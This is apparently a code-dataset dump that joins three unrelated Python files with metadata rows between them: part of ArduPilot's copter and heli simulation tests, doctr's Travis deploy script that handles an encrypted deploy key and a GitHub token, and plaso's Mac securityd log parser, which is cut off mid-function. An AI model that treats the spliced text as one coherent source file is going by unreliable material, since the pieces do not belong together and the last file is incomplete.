"Test RangeFinder Basic Functionality",
self.test_rangefinder), # 23s
("SurfaceTracking",
"Test Surface Tracking",
self.test_surface_tracking), # 45s
("Parachute",
"Test Parachute Functionality",
self.test_parachute),
("ParameterChecks",
"Test Arming Parameter Checks",
self.test_parameter_checks),
("ManualThrottleModeChange",
"Check manual throttle mode changes denied on high throttle",
self.fly_manual_throttle_mode_change),
("MANUAL_CONTROL",
"Test mavlink MANUAL_CONTROL",
self.test_manual_control),
("ZigZag",
"Fly ZigZag Mode",
self.fly_zigzag_mode), # 58s
("PosHoldTakeOff",
"Fly POSHOLD takeoff",
self.fly_poshold_takeoff),
("FOLLOW",
"Fly follow mode",
self.fly_follow_mode), # 80s
("RangeFinderDrivers",
"Test rangefinder drivers",
self.fly_rangefinder_drivers), # 62s
("MaxBotixI2CXL",
"Test maxbotix rangefinder drivers",
self.fly_rangefinder_driver_maxbotix), # 62s
("MAVProximity",
"Test MAVLink proximity driver",
self.fly_proximity_mavlink_distance_sensor,
),
("ParameterValidation",
"Test parameters are checked for validity",
self.test_parameter_validation),
("AltTypes",
"Test Different Altitude Types",
self.test_altitude_types),
("RichenPower",
"Test RichenPower generator",
self.test_richenpower),
("IE24",
"Test IntelligentEnergy 2.4kWh generator",
self.test_ie24),
("LogUpload",
"Log upload",
self.log_upload),
])
return ret
# a wrapper around all the 2A,2B,2C..etc tests for travis
def tests2(self):
ret = ([])
ret.extend(self.tests2a())
ret.extend(self.tests2b())
return ret
def tests2a(self):
'''return list of all tests'''
ret = ([
# something about SITLCompassCalibration appears to fail
# this one, so we put it first:
("FixedYawCalibration",
"Test Fixed Yaw Calibration", # about 20 secs
self.test_fixed_yaw_calibration),
# we run this single 8min-and-40s test on its own, apart from
# requiring FixedYawCalibration right before it because without it, it fails to calibrate
("SITLCompassCalibration", # this autotest appears to interfere with FixedYawCalibration, no idea why.
"Test SITL onboard compass calibration",
self.test_mag_calibration),
])
return ret
    def tests2b(self):  # this block currently runs for around 9.5mins
'''return list of all tests'''
ret = ([
Test("MotorVibration",
"Fly motor vibration test",
self.fly_motor_vibration),
Test("DynamicNotches",
"Fly Dynamic Notches",
self.fly_dynamic_notches,
attempts=8),
Test("PositionWhenGPSIsZero",
"Ensure position doesn't zero when GPS lost",
self.test_copter_gps_zero),
Test("GyroFFT",
"Fly Gyro FFT",
self.fly_gyro_fft,
attempts=8),
Test("GyroFFTHarmonic",
"Fly Gyro FFT Harmonic Matching",
self.fly_gyro_fft_harmonic,
attempts=8),
Test("CompassReordering",
"Test Compass reordering when priorities are changed",
self.test_mag_reordering), # 40sec?
Test("CRSF",
"Test RC CRSF",
self.test_crsf), # 20secs ish
Test("MotorTest",
"Run Motor Tests",
self.test_motortest), # 20secs ish
Test("AltEstimation",
"Test that Alt Estimation is mandatory for ALT_HOLD",
self.test_alt_estimate_prearm), # 20secs ish
Test("EKFSource",
"Check EKF Source Prearms work",
self.test_ekf_source),
Test("GSF",
"Check GSF",
self.test_gsf),
Test("FlyEachFrame",
"Fly each supported internal frame",
self.fly_each_frame),
Test("GPSBlending",
"Test GPS Blending",
self.test_gps_blending),
Test("DataFlash",
"Test DataFlash Block backend",
self.test_dataflash_sitl),
Test("DataFlashErase",
"Test DataFlash Block backend erase",
self.test_dataflash_erase),
Test("Callisto",
"Test Callisto",
self.test_callisto),
Test("Replay",
"Test Replay",
self.test_replay),
Test("LogUpload",
"Log upload",
self.log_upload),
])
return ret
def testcan(self):
ret = ([
("CANGPSCopterMission",
"Fly copter mission",
self.fly_auto_test_using_can_gps),
])
return ret
def tests(self):
ret = []
ret.extend(self.tests1())
ret.extend(self.tests2())
return ret
def disabled_tests(self):
return {
"Parachute": "See https://github.com/ArduPilot/ardupilot/issues/4702",
"HorizontalAvoidFence": "See https://github.com/ArduPilot/ardupilot/issues/11525",
"AltEstimation": "See https://github.com/ArduPilot/ardupilot/issues/15191",
}
class AutoTestHeli(AutoTestCopter):
def log_name(self):
return "HeliCopter"
def default_frame(self):
return "heli"
def sitl_start_location(self):
return SITL_START_LOCATION_AVC
def default_speedup(self):
'''Heli seems to be race-free'''
return 100
def is_heli(self):
return True
def rc_defaults(self):
ret = super(AutoTestHeli, self).rc_defaults()
ret[8] = 1000
ret[3] = 1000 # collective
return ret
@staticmethod
def get_position_armable_modes_list():
'''filter THROW mode out of armable modes list; Heli is special-cased'''
ret = AutoTestCopter.get_position_armable_modes_list()
ret = filter(lambda x : x != "THROW", ret)
return ret
def loiter_requires_position(self):
self.progress("Skipping loiter-requires-position for heli; rotor runup issues")
def get_collective_out(self):
servo = self.mav.recv_match(type='SERVO_OUTPUT_RAW', blocking=True)
chan_pwm = (servo.servo1_raw + servo.servo2_raw + servo.servo3_raw)/3.0
return chan_pwm
def rotor_runup_complete_checks(self):
# Takeoff and landing in Loiter
TARGET_RUNUP_TIME = 10
self.zero_throttle()
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
servo = self.mav.recv_match(type='SERVO_OUTPUT_RAW', blocking=True)
coll = servo.servo1_raw
coll = coll + 50
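        # use the current collective output plus a 50us margin as the
        # threshold indicating the takeoff collective has been raised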
self.set_parameter("H_RSC_RUNUP_TIME", TARGET_RUNUP_TIME)
self.progress("Initiate Runup by putting some throttle")
self.set_rc(8, 2000)
self.set_rc(3, 1700)
self.progress("Collective threshold PWM %u" % coll)
tstart = self.get_sim_time()
self.progress("Wait that collective PWM pass threshold value")
servo = self.mav.recv_match(condition='SERVO_OUTPUT_RAW.servo1_raw>%u' % coll, blocking=True)
runup_time = self.get_sim_time() - tstart
self.progress("Collective is now at PWM %u" % servo.servo1_raw)
self.mav.wait_heartbeat()
if runup_time < TARGET_RUNUP_TIME:
self.zero_throttle()
self.set_rc(8, 1000)
self.disarm_vehicle()
self.mav.wait_heartbeat()
raise NotAchievedException("Takeoff initiated before runup time complete %u" % runup_time)
self.progress("Runup time %u" % runup_time)
self.zero_throttle()
self.set_rc(8, 1000)
self.land_and_disarm()
self.mav.wait_heartbeat()
# fly_avc_test - fly AVC mission
def fly_avc_test(self):
# Arm
self.change_mode('STABILIZE')
self.wait_ready_to_arm()
self.arm_vehicle()
self.progress("Raising rotor speed")
self.set_rc(8, 2000)
# upload mission from file
self.progress("# Load copter_AVC2013_mission")
# load the waypoint count
num_wp = self.load_mission("copter_AVC2013_mission.txt", strict=False)
if not num_wp:
raise NotAchievedException("load copter_AVC2013_mission failed")
self.progress("Fly AVC mission from 1 to %u" % num_wp)
self.set_current_waypoint(1)
# wait for motor runup
self.delay_sim_time(20)
# switch into AUTO mode and raise throttle
self.change_mode('AUTO')
self.set_rc(3, 1500)
# fly the mission
self.wait_waypoint(0, num_wp-1, timeout=500)
# set throttle to minimum
self.zero_throttle()
# wait for disarm
self.wait_disarmed()
self.progress("MOTORS DISARMED OK")
self.progress("Lowering rotor speed")
self.set_rc(8, 1000)
self.progress("AVC mission completed: passed!")
def fly_heli_poshold_takeoff(self):
"""ensure vehicle stays put until it is ready to fly"""
self.context_push()
ex = None
try:
self.set_parameter("PILOT_TKOFF_ALT", 700)
self.change_mode('POSHOLD')
self.zero_throttle()
self.set_rc(8, 1000)
self.wait_ready_to_arm()
# Arm
self.arm_vehicle()
self.progress("Raising rotor speed")
self.set_rc(8, 2000)
self.progress("wait for rotor runup to complete")
self.wait_servo_channel_value(8, 1660, timeout=10)
self.delay_sim_time(20)
# check we are still on the ground...
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
max_relalt_mm = 1000
if abs(m.relative_alt) > max_relalt_mm:
raise NotAchievedException("Took off prematurely (abs(%f)>%f)" %
(m.relative_alt, max_relalt_mm))
self.progress("Pushing collective past half-way")
self.set_rc(3, 1600)
self.delay_sim_time(0.5)
self.progress("Bringing back to hover collective")
self.set_rc(3, 1500)
# make sure we haven't already reached alt:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
if abs(m.relative_alt) > 500:
raise NotAchievedException("Took off too fast")
self.progress("Monitoring takeoff-to-alt")
self.wait_altitude(6.9, 8, relative=True)
self.progress("Making sure we stop at our takeoff altitude")
tstart = self.get_sim_time()
while self.get_sim_time() - tstart < 5:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
delta = abs(7000 - m.relative_alt)
self.progress("alt=%f delta=%f" % (m.relative_alt/1000,
delta/1000))
if delta > 1000:
raise NotAchievedException("Failed to maintain takeoff alt")
self.progress("takeoff OK")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.land_and_disarm()
self.set_rc(8, 1000)
self.context_pop()
if ex is not None:
raise ex
def fly_heli_stabilize_takeoff(self):
""""""
self.context_push()
ex = None
try:
self.change_mode('STABILIZE')
self.set_rc(3, 1000)
self.set_rc(8, 1000)
self.wait_ready_to_arm()
self.arm_vehicle()
self.set_rc(8, 2000)
self.progress("wait for rotor runup to complete")
self.wait_servo_channel_value(8, 1660, timeout=10)
self.delay_sim_time(20)
# check we are still on the ground...
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
if abs(m.relative_alt) > 100:
raise NotAchievedException("Took off prematurely")
self.progress("Pushing throttle past half-way")
self.set_rc(3, 1600)
self.progress("Monitoring takeoff")
self.wait_altitude(6.9, 8, relative=True)
self.progress("takeoff OK")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.land_and_disarm()
self.set_rc(8, 1000)
self.context_pop()
if ex is not None:
raise ex
def fly_spline_waypoint(self, timeout=600):
"""ensure basic spline functionality works"""
self.load_mission("copter_spline_mission.txt", strict=False)
self.change_mode("LOITER")
self.wait_ready_to_arm()
self.arm_vehicle()
self.progress("Raising rotor speed")
self.set_rc(8, 2000)
self.delay_sim_time(20)
self.change_mode("AUTO")
self.set_rc(3, 1500)
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > timeout:
raise AutoTestTimeoutException("Vehicle did not disarm after mission")
if not self.armed():
break
self.delay_sim_time(1)
self.progress("Lowering rotor speed")
self.set_rc(8, 1000)
def fly_autorotation(self, timeout=600):
"""ensure basic spline functionality works"""
self.set_parameter("AROT_ENABLE", 1)
start_alt = 100 # metres
self.set_parameter("PILOT_TKOFF_ALT", start_alt * 100)
self.change_mode('POSHOLD')
self.set_rc(3, 1000)
self.set_rc(8, 1000)
self.wait_ready_to_arm()
self.arm_vehicle()
self.set_rc(8, 2000)
self.progress("wait for rotor runup to complete")
self.wait_servo_channel_value(8, 1660, timeout=10)
self.delay_sim_time(20)
self.set_rc(3, 2000)
self.wait_altitude(start_alt - 1,
(start_alt + 5),
relative=True,
timeout=timeout)
self.context_collect('STATUSTEXT')
self.progress("Triggering autorotate by raising interlock")
self.set_rc(8, 1000)
self.wait_statustext("SS Glide Phase", check_context=True)
self.wait_statustext(r"SIM Hit ground at ([0-9.]+) m/s",
check_context=True,
regex=True)
speed = float(self.re_match.group(1))
if speed > 30:
raise NotAchievedException("Hit too hard")
self.wait_disarmed()
def set_rc_default(self):
super(AutoTestHeli, self).set_rc_default()
self.progress("Lowering rotor speed")
self.set_rc(8, 1000)
def tests(self):
'''return list of all tests'''
ret = AutoTest.tests(self)
ret.extend([
("AVCMission", "Fly AVC mission", self.fly_avc_test),
("RotorRunUp",
"Test rotor runup",
self.rotor_runup_complete_checks),
("PosHoldTakeOff",
"Fly POSHOLD takeoff",
self.fly_heli_poshold_takeoff),
("StabilizeTakeOff",
"Fly stabilize takeoff",
self.fly_heli_stabilize_takeoff),
("SplineWaypoint",
"Fly Spline Waypoints",
self.fly_spline_waypoint),
("AutoRotation",
"Fly AutoRotation",
self.fly_autorotation),
("LogUpload",
"Log upload",
self.log_upload),
])
return ret
def disabled_tests(self):
return {
"SplineWaypoint": "See https://github.com/ArduPilot/ardupilot/issues/14593",
}
class AutoTestCopterTests1(AutoTestCopter):
def tests(self):
return self.tests1()
class AutoTestCopterTests1a(AutoTestCopter):
def tests(self):
return self.tests1a()
class AutoTestCopterTests1b(AutoTestCopter):
def tests(self):
return self.tests1b()
class AutoTestCopterTests1c(AutoTestCopter):
def tests(self):
return self.tests1c()
class AutoTestCopterTests1d(AutoTestCopter):
def tests(self):
return self.tests1d()
class AutoTestCopterTests1e(AutoTestCopter):
def tests(self):
return self.tests1e()
class AutoTestCopterTests2(AutoTestCopter):
def tests(self):
return self.tests2()
class AutoTestCopterTests2a(AutoTestCopter):
def tests(self):
return self.tests2a()
class AutoTestCopterTests2b(AutoTestCopter):
def tests(self):
return self.tests2b()
class AutoTestCAN(AutoTestCopter):
def tests(self):
return self.testcan()
|
gpl-3.0
| 940,847,501,828,778,200
| 37.953043
| 127
| 0.537486
| false
| 3.739827
| true
| false
| false
|
gforsyth/doctr_testing
|
doctr/travis.py
|
1
|
12160
|
"""
The code that should be run on Travis
"""
import os
import shlex
import shutil
import subprocess
import sys
import glob
from cryptography.fernet import Fernet
def decrypt_file(file, key):
"""
Decrypts the file ``file``.
The encrypted file is assumed to end with the ``.enc`` extension. The
decrypted file is saved to the same location without the ``.enc``
extension.
The permissions on the decrypted file are automatically set to 0o600.
See also :func:`doctr.local.encrypt_file`.
"""
if not file.endswith('.enc'):
raise ValueError("%s does not end with .enc" % file)
fer = Fernet(key)
with open(file, 'rb') as f:
decrypted_file = fer.decrypt(f.read())
with open(file[:-4], 'wb') as f:
f.write(decrypted_file)
os.chmod(file[:-4], 0o600)
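# Example (hypothetical filenames): given 'github_deploy_key.enc' and the
# Fernet key from the environment, decrypt_file('github_deploy_key.enc', key)
# writes 'github_deploy_key' alongside it with 0o600 permissions.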
def setup_deploy_key(keypath='github_deploy_key', key_ext='.enc'):
"""
Decrypts the deploy key and configures it with ssh
The key is assumed to be encrypted as keypath + key_ext, and the
encryption key is assumed to be set in the environment variable
DOCTR_DEPLOY_ENCRYPTION_KEY.
"""
key = os.environ.get("DOCTR_DEPLOY_ENCRYPTION_KEY", None)
if not key:
raise RuntimeError("DOCTR_DEPLOY_ENCRYPTION_KEY environment variable is not set")
key_filename = os.path.basename(keypath)
key = key.encode('utf-8')
decrypt_file(keypath + key_ext, key)
key_path = os.path.expanduser("~/.ssh/" + key_filename)
os.makedirs(os.path.expanduser("~/.ssh"), exist_ok=True)
os.rename(keypath, key_path)
with open(os.path.expanduser("~/.ssh/config"), 'a') as f:
f.write("Host github.com"
' IdentityFile "%s"'
" LogLevel ERROR\n" % key_path)
# start ssh-agent and add key to it
# info from SSH agent has to be put into the environment
agent_info = subprocess.check_output(['ssh-agent', '-s'])
agent_info = agent_info.decode('utf-8')
agent_info = agent_info.split()
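    # `ssh-agent -s` prints e.g.:
    #   SSH_AUTH_SOCK=/tmp/ssh-XXXX/agent.123; export SSH_AUTH_SOCK;
    #   SSH_AGENT_PID=456; export SSH_AGENT_PID;
    # so after split(), tokens 0 and 3 carry the assignments and the
    # trailing ';' is stripped with [:-1]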
AUTH_SOCK = agent_info[0].split('=')[1][:-1]
AGENT_PID = agent_info[3].split('=')[1][:-1]
os.putenv('SSH_AUTH_SOCK', AUTH_SOCK)
os.putenv('SSH_AGENT_PID', AGENT_PID)
run(['ssh-add', os.path.expanduser('~/.ssh/' + key_filename)])
# XXX: Do this in a way that is streaming
def run_command_hiding_token(args, token):
command = ' '.join(map(shlex.quote, args))
command = command.replace(token.decode('utf-8'), '~'*len(token))
print(command)
p = subprocess.run(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.stdout, p.stderr
out = out.replace(token, b"~"*len(token))
err = err.replace(token, b"~"*len(token))
return (out, err, p.returncode)
def get_token():
"""
Get the encrypted GitHub token in Travis.
    Make sure the contents of this variable do not leak. The ``run()`` function
will remove this from the output, so always use it.
"""
token = os.environ.get("GH_TOKEN", None)
if not token:
raise RuntimeError("GH_TOKEN environment variable not set")
token = token.encode('utf-8')
return token
def run(args):
"""
Run the command ``args``.
Automatically hides the secret GitHub token from the output.
"""
if "DOCTR_DEPLOY_ENCRYPTION_KEY" in os.environ:
token = b''
else:
token = get_token()
out, err, returncode = run_command_hiding_token(args, token)
if out:
print(out.decode('utf-8'))
if err:
print(err.decode('utf-8'), file=sys.stderr)
if returncode != 0:
sys.exit(returncode)
def get_current_repo():
"""
Get the GitHub repo name for the current directory.
Assumes that the repo is in the ``origin`` remote.
"""
remote_url = subprocess.check_output(['git', 'config', '--get',
'remote.origin.url']).decode('utf-8')
# Travis uses the https clone url
_, org, git_repo = remote_url.rsplit('.git', 1)[0].rsplit('/', 2)
return (org + '/' + git_repo)
def setup_GitHub_push(deploy_repo, auth_type='deploy_key', full_key_path='github_deploy_key.enc', require_master=True, deploy_branch='gh-pages'):
"""
Setup the remote to push to GitHub (to be run on Travis).
``auth_type`` should be either ``'deploy_key'`` or ``'token'``.
For ``auth_type='token'``, this sets up the remote with the token and
    checks out the deploy branch. The token to push to GitHub is assumed to
    be in the ``GH_TOKEN`` environment variable.
For ``auth_type='deploy_key'``, this sets up the remote with ssh access.
"""
if auth_type not in ['deploy_key', 'token']:
raise ValueError("auth_type must be 'deploy_key' or 'token'")
TRAVIS_BRANCH = os.environ.get("TRAVIS_BRANCH", "")
TRAVIS_PULL_REQUEST = os.environ.get("TRAVIS_PULL_REQUEST", "")
if TRAVIS_BRANCH != "master" and require_master:
print("The docs are only pushed to {} from master. To allow pushing from "
"a non-master branch, use the --no-require-master flag".format(deploy_branch), file=sys.stderr)
print("This is the {TRAVIS_BRANCH} branch".format(TRAVIS_BRANCH=TRAVIS_BRANCH), file=sys.stderr)
return False
if TRAVIS_PULL_REQUEST != "false":
print("The website and docs are not pushed to {} on pull requests".format(deploy_branch),
file=sys.stderr)
return False
print("Setting git attributes")
# Should we add some user.email?
run(['git', 'config', '--global', 'user.name', "Doctr (Travis CI)"])
remotes = subprocess.check_output(['git', 'remote']).decode('utf-8').split('\n')
if 'doctr_remote' in remotes:
print("doctr_remote already exists, removing")
run(['git', 'remote', 'remove', 'doctr_remote'])
print("Adding doctr remote")
if auth_type == 'token':
token = get_token()
run(['git', 'remote', 'add', 'doctr_remote',
'https://{token}@github.com/{deploy_repo}.git'.format(token=token.decode('utf-8'),
deploy_repo=deploy_repo)])
else:
keypath, key_ext = full_key_path.rsplit('.', 1)
key_ext = '.' + key_ext
setup_deploy_key(keypath=keypath, key_ext=key_ext)
run(['git', 'remote', 'add', 'doctr_remote',
'git@github.com:{deploy_repo}.git'.format(deploy_repo=deploy_repo)])
print("Fetching doctr remote")
run(['git', 'fetch', 'doctr_remote'])
    # create an empty branch with .nojekyll if it doesn't already exist
new_deploy_branch = create_deploy_branch(deploy_branch)
print("Checking out {}".format(deploy_branch))
local_deploy_branch_exists = deploy_branch in subprocess.check_output(['git', 'branch']).decode('utf-8').split()
if new_deploy_branch or local_deploy_branch_exists:
run(['git', 'checkout', deploy_branch])
run(['git', 'pull', 'doctr_remote', deploy_branch])
else:
run(['git', 'checkout', '-b', deploy_branch, '--track',
'doctr_remote/{}'.format(deploy_branch)])
print("Done")
return True
def deploy_branch_exists(deploy_branch='gh-pages'):
"""Check if the remote deploy branch exists
This isn't completely robust. If there are multiple remotes and the branch
is created on the non-default remote, this won't see it.
"""
remote_name = 'doctr_remote'
branch_names = subprocess.check_output(['git', 'branch', '-r']).decode('utf-8').split()
return '{remote}/{branch}'.format(remote=remote_name,
branch=deploy_branch) in branch_names
def create_deploy_branch(deploy_branch):
"""
If there is no remote deploy branch, create one.
Return True if branch was created, False if not.
Default value for deploy_branch is ``gh-pages``
"""
if not deploy_branch_exists(deploy_branch):
print("Creating {} branch".format(deploy_branch))
run(['git', 'checkout', '--orphan', deploy_branch])
# delete everything in the new ref. this is non-destructive to existing
# refs/branches, etc...
run(['git', 'rm', '-rf', '.'])
print("Adding .nojekyll file to {}".format(deploy_branch))
run(['touch', '.nojekyll'])
run(['git', 'add', '.nojekyll'])
run(['git', 'commit', '-m', 'Create new branch {} with .nojekyll'.format(deploy_branch)])
print("Pushing branch {} to remote".format(deploy_branch))
run(['git', 'push', '-u', 'doctr_remote', deploy_branch])
# return to master branch
run(['git', 'checkout', '-'])
return True
return False
def find_sphinx_build_dir():
"""
Find build subfolder within sphinx docs directory.
This is called by :func:`commit_docs` if keyword arg ``built_docs`` is not
specified on the command line.
"""
build = glob.glob('**/*build/html', recursive=True)
if not build:
raise RuntimeError("Could not find Sphinx build directory automatically")
build_folder = build[0]
return build_folder
# Here is the logic to get the Travis job number, to only run commit_docs in
# the right build.
#
# TRAVIS_JOB_NUMBER = os.environ.get("TRAVIS_JOB_NUMBER", '')
# ACTUAL_TRAVIS_JOB_NUMBER = TRAVIS_JOB_NUMBER.split('.')[1]
def sync_from_log(src, dst, log_file):
"""
Sync the files in ``src`` to ``dst``.
The files that are synced are logged to ``log_file``. If ``log_file``
exists, the files in ``log_file`` are removed first.
Returns ``(added, removed)``, where added is a list of all files synced from
``src`` (even if it already existed in ``dst``), and ``removed`` is every
file from ``log_file`` that was removed from ``dst`` because it wasn't in
``src``. ``added`` also includes the log file.
"""
from os.path import join, exists, isdir
if not src.endswith(os.sep):
src += os.sep
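    # guarantee a trailing separator so f[len(src):] below yields a path
    # relative to src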
added, removed = [], []
if not exists(log_file):
# Assume this is the first run
print("%s doesn't exist. Not removing any files." % log_file)
else:
with open(log_file) as f:
files = f.read().strip().split('\n')
for new_f in files:
new_f = new_f.strip()
if exists(new_f):
os.remove(new_f)
removed.append(new_f)
else:
print("Warning: File %s doesn't exist." % new_f, file=sys.stderr)
files = glob.iglob(join(src, '**'), recursive=True)
# sorted makes this easier to test
for f in sorted(files):
new_f = join(dst, f[len(src):])
if isdir(f):
os.makedirs(new_f, exist_ok=True)
else:
shutil.copy2(f, new_f)
added.append(new_f)
if new_f in removed:
removed.remove(new_f)
with open(log_file, 'w') as f:
f.write('\n'.join(added))
added.append(log_file)
return added, removed
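# Example (hypothetical arguments): sync_from_log('_build/html', '.', '.doctr-files')
# would copy the freshly built docs into the working tree and remove files
# that were deployed previously but no longer exist in the build.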
def commit_docs(*, added, removed):
"""
Commit the docs to ``gh-pages`` or a specified deploy branch.
Assumes that :func:`setup_GitHub_push`, which sets up the ``doctr_remote``
remote, has been run and returned True.
Returns True if changes were committed and False if no changes were
committed.
"""
TRAVIS_BUILD_NUMBER = os.environ.get("TRAVIS_BUILD_NUMBER", "<unknown>")
for f in added:
run(['git', 'add', f])
for f in removed:
run(['git', 'rm', f])
# Only commit if there were changes
if subprocess.run(['git', 'diff-index', '--quiet', 'HEAD', '--'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE).returncode != 0:
print("Committing")
run(['git', 'commit', '-am', "Update docs after building Travis build " + TRAVIS_BUILD_NUMBER])
return True
return False
def push_docs(deploy_branch='gh-pages'):
"""
Push the changes to the ``gh-pages`` branch or specified deploy branch.
Assumes that :func:`setup_GitHub_push` has been run and returned True, and
that :func:`commit_docs` has been run. Does not push anything if no changes
were made.
"""
print("Pulling")
run(['git', 'pull'])
print("Pushing commit")
run(['git', 'push', '-q', 'doctr_remote', deploy_branch])
|
mit
| -1,302,443,846,925,126,700
| 33.842407
| 145
| 0.616283
| false
| 3.577523
| false
| false
| false
|
cvandeplas/plaso
|
plaso/parsers/mac_securityd.py
|
1
|
9467
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2014 The Plaso Project Authors.
# Please see the AUTHORS file for details on individual authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This file contains the ASL securityd log plaintext parser."""
import datetime
import logging
import pyparsing
from plaso.events import time_events
from plaso.lib import eventdata
from plaso.lib import timelib
from plaso.parsers import manager
from plaso.parsers import text_parser
__author__ = 'Joaquin Moreno Garijo (Joaquin.MorenoGarijo.2013@live.rhul.ac.uk)'
# INFO:
# http://opensource.apple.com/source/Security/Security-55471/sec/securityd/
class MacSecuritydLogEvent(time_events.TimestampEvent):
"""Convenience class for a ASL securityd line event."""
DATA_TYPE = 'mac:asl:securityd:line'
def __init__(
self, timestamp, structure, sender, sender_pid,
security_api, caller, message):
"""Initializes the event object.
Args:
timestamp: The timestamp time value, epoch.
      structure: Structure with the parsed fields; supplies the priority
          level and the ASL facility.
sender: String with the name of the sender.
sender_pid: Process id of the sender.
security_api: Securityd function name.
caller: The caller field, a string containing two hex numbers.
message: String with the ASL message.
"""
super(MacSecuritydLogEvent, self).__init__(
timestamp,
eventdata.EventTimestamp.ADDED_TIME)
self.timestamp = timestamp
self.level = structure.level
self.sender_pid = sender_pid
self.facility = structure.facility
self.sender = sender
self.security_api = security_api
self.caller = caller
self.message = message
class MacSecuritydLogParser(text_parser.PyparsingSingleLineTextParser):
"""Parses the securityd file that contains logs from the security daemon."""
NAME = 'mac_securityd'
DESCRIPTION = u'Parser for Mac OS X securityd log files.'
ENCODING = u'utf-8'
# Default ASL Securityd log.
SECURITYD_LINE = (
text_parser.PyparsingConstants.MONTH.setResultsName('month') +
text_parser.PyparsingConstants.ONE_OR_TWO_DIGITS.setResultsName('day') +
text_parser.PyparsingConstants.TIME.setResultsName('time') +
pyparsing.CharsNotIn(u'[').setResultsName('sender') +
pyparsing.Literal(u'[').suppress() +
text_parser.PyparsingConstants.PID.setResultsName('sender_pid') +
pyparsing.Literal(u']').suppress() +
pyparsing.Literal(u'<').suppress() +
pyparsing.CharsNotIn(u'>').setResultsName('level') +
pyparsing.Literal(u'>').suppress() +
pyparsing.Literal(u'[').suppress() +
pyparsing.CharsNotIn(u'{').setResultsName('facility') +
pyparsing.Literal(u'{').suppress() +
pyparsing.Optional(pyparsing.CharsNotIn(
u'}').setResultsName('security_api')) +
pyparsing.Literal(u'}').suppress() +
pyparsing.Optional(pyparsing.CharsNotIn(u']:').setResultsName('caller')) +
pyparsing.Literal(u']:').suppress() +
pyparsing.SkipTo(pyparsing.lineEnd).setResultsName('message'))
# Repeated line.
REPEATED_LINE = (
text_parser.PyparsingConstants.MONTH.setResultsName('month') +
text_parser.PyparsingConstants.ONE_OR_TWO_DIGITS.setResultsName('day') +
text_parser.PyparsingConstants.TIME.setResultsName('time') +
pyparsing.Literal(u'--- last message repeated').suppress() +
text_parser.PyparsingConstants.INTEGER.setResultsName('times') +
pyparsing.Literal(u'time ---').suppress())
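  # e.g. matches: u'Nov  8 20:36:37 --- last message repeated 3 time ---'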
# Define the available log line structures.
LINE_STRUCTURES = [
('logline', SECURITYD_LINE),
('repeated', REPEATED_LINE)]
def __init__(self):
"""Initializes a parser object."""
super(MacSecuritydLogParser, self).__init__()
self._year_use = 0
self._last_month = None
self.previous_structure = None
def VerifyStructure(self, parser_context, line):
"""Verify that this file is a ASL securityd log file.
Args:
parser_context: A parser context object (instance of ParserContext).
line: A single line from the text file.
Returns:
True if this is the correct parser, False otherwise.
"""
try:
line = self.SECURITYD_LINE.parseString(line)
except pyparsing.ParseException:
      logging.debug(u'Not an ASL securityd log file')
return False
# Check if the day, month and time is valid taking a random year.
month = timelib.MONTH_DICT.get(line.month.lower())
if not month:
return False
if self._GetTimestamp(line.day, month, 2012, line.time) == 0:
return False
return True
def ParseRecord(self, parser_context, key, structure):
"""Parse each record structure and return an EventObject if applicable.
Args:
parser_context: A parser context object (instance of ParserContext).
key: An identification string indicating the name of the parsed
structure.
structure: A pyparsing.ParseResults object from a line in the
log file.
Returns:
An event object (instance of EventObject) or None.
"""
if key == 'repeated' or key == 'logline':
return self._ParseLogLine(parser_context, structure, key)
else:
logging.warning(
u'Unable to parse record, unknown structure: {0:s}'.format(key))
def _ParseLogLine(self, parser_context, structure, key):
"""Parse a logline and store appropriate attributes.
Args:
parser_context: A parser context object (instance of ParserContext).
key: An identification string indicating the name of the parsed
structure.
structure: A pyparsing.ParseResults object from a line in the
log file.
Returns:
An event object (instance of EventObject) or None.
"""
    # TODO: improve this to get a valid year.
if not self._year_use:
self._year_use = parser_context.year
if not self._year_use:
# Get from the creation time of the file.
self._year_use = self._GetYear(
self.file_entry.GetStat(), parser_context.timezone)
# If fail, get from the current time.
if not self._year_use:
self._year_use = timelib.GetCurrentYear()
    # Detect a year rollover: the month going backwards between lines.
month = timelib.MONTH_DICT.get(structure.month.lower())
if not self._last_month:
self._last_month = month
if month < self._last_month:
self._year_use += 1
timestamp = self._GetTimestamp(
structure.day,
month,
self._year_use,
structure.time)
if not timestamp:
      logging.debug(u'Invalid timestamp {0!s}'.format(structure.time))
return
self._last_month = month
if key == 'logline':
self.previous_structure = structure
message = structure.message
else:
times = structure.times
structure = self.previous_structure
message = u'Repeated {0:d} times: {1:s}'.format(
times, structure.message)
    # It uses the CharsNotIn structure, which leaves whitespace
    # at the beginning of the sender and the caller.
sender = structure.sender.strip()
caller = structure.caller.strip()
if not caller:
caller = 'unknown'
if not structure.security_api:
security_api = u'unknown'
else:
security_api = structure.security_api
return MacSecuritydLogEvent(
timestamp, structure, sender, structure.sender_pid, security_api,
caller, message)
def _GetTimestamp(self, day, month, year, time):
"""Gets a timestamp from a pyparsing ParseResults timestamp.
This is a timestamp_string as returned by using
text_parser.PyparsingConstants structures:
08, Nov, [20, 36, 37]
Args:
day: An integer representing the day.
month: An integer representing the month.
year: An integer representing the year.
time: A list containing the hours, minutes, seconds.
Returns:
timestamp: A plaso timestamp.
"""
hours, minutes, seconds = time
return timelib.Timestamp.FromTimeParts(
year, month, day, hours, minutes, seconds)
def _GetYear(self, stat, zone):
"""Retrieves the year either from the input file or from the settings."""
time = getattr(stat, 'crtime', 0)
if not time:
time = getattr(stat, 'ctime', 0)
if not time:
current_year = timelib.GetCurrentYear()
logging.error((
